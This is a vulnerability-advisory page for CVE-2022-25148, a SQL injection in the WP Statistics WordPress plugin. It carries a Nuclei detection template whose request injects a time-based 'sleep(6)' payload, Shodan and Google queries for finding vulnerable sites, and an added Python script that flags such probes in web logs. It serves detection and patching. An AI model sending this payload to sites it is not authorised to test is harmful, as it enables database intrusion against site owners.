WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
ID: CVE-2022-25148
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs
Description
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter handled in the ~/includes/class-wp-statistics-hits.php file, which allows unauthenticated attackers to inject arbitrary SQL queries and obtain sensitive information, in versions up to and including 13.1.5.
YAML Source
id: CVE-2022-25148

info:
  name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
  remediation: Update wp-statistics plugin to version 13.1.6, or newer.
  reference:
    - https://wordpress.org/plugins/wp-statistics/
    - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25148
    - http://packetstormsecurity.com/files/174482/WordPress-WP-Statistics-13.1.5-SQL-Injection.html
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2679983%40wp-statistics&new=2679983%40wp-statistics&sfp_email=&sfph_mail=
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25148
    cwe-id: CWE-89
    epss-score: 0.10089
    epss-percentile: 0.94364
    cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: veronalabs
    product: wp_statistics
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wp-statistics/
    fofa-query: body=/wp-content/plugins/wp-statistics/
    publicwww-query: /wp-content/plugins/wp-statistics/
    google-query: inurl:/wp-content/plugins/wp-statistics
  tags: time-based-sqli,cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 15s
        GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header, "application/json")
          - contains(body, 'Visitor Hit was recorded successfully')
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '_wpnonce=([0-9a-zA-Z]+)'
        internal: true
# digest: 4b0a00483046022100e0d6d4519a9a68bb4b4c44a0113d1d769d424d4bd235cb4673370924765d7595022100d53783cab9470d1cb7a6ceab3f3eaf1e147de5d791dc4b325a1084c79ad44520:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This is a Nuclei template for detecting the vulnerability in a web application. Run it with the Nuclei scanner against a target; the template first fetches the front page to extract a _wpnonce value, then sends the hit request and reports a match only when the response is delayed by at least six seconds, returns HTTP 200 with a JSON content type, and contains the text "Visitor Hit was recorded successfully".
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-25148.yaml"
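As an added example (not part of this advisory, the template, or the WP Statistics plugin), the following Python scans combined-format web access logs for requests to the hit endpoint named above whose current_page_id, which the plugin expects to be a numeric post id, carries anything else, so that probes of this kind can be spotted after the fact. The log format, the list of integer-only parameters, and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# REST endpoint named in the advisory above.
HIT_PATH = "/wp-json/wp-statistics/v2/hit"
# Parameters assumed to carry plain integer ids. current_page_id is the one
# named in CVE-2022-25148; user_id and timestamp are included by analogy
# (assumption, not taken from the plugin source).
INT_PARAMS = ("current_page_id", "user_id", "timestamp")

# Apache/nginx combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_params(target: str) -> dict:
    """Return {param: value} for integer-only parameters of the hit endpoint whose
    value is not an unsigned integer. Blank values are tolerated because the plugin
    sends empty parameters for some page types (assumption). Other paths yield {}."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != HIT_PATH:
        return {}
    # parse_qs percent-decodes, so sleep%286%29 and sleep(6) are treated alike.
    query = parse_qs(parts.query, keep_blank_values=True)
    return {
        name: value
        for name in INT_PARAMS
        for value in query.get(name, [])
        if not re.fullmatch(r"[0-9]*", value)
    }


def scan_log(lines) -> list:
    """Return (client_ip, request_target, bad_params) for every flagged request."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        bad = suspicious_params(m.group("target"))
        if bad:
            flagged.append((m.group("ip"), m.group("target"), bad))
    return flagged


# Constructed sample log lines (not from a real server): a normal hit, a probe
# shaped like the template's second request, and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-json/wp-statistics/v2/hit?_wpnonce=abc123&current_page_type=post&current_page_id=42&user_id=0 HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2023:13:57:01 +0000] "GET /wp-json/wp-statistics/v2/hit?_wpnonce=abc123&timestamp=11&current_page_type=home&current_page_id=sleep(6)&user_id=0 HTTP/1.1" 200 58 "-" "Something"',
    '203.0.113.7 - - [10/Oct/2023:13:58:12 +0000] "GET /wp-login.php HTTP/1.1" 200 4012 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, bad in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {bad} in {target}")
```

Pair the log check with the template's own signal: a flagged request whose logged response time is several seconds longer than neighbouring hits is the time-based pattern the matchers above look for.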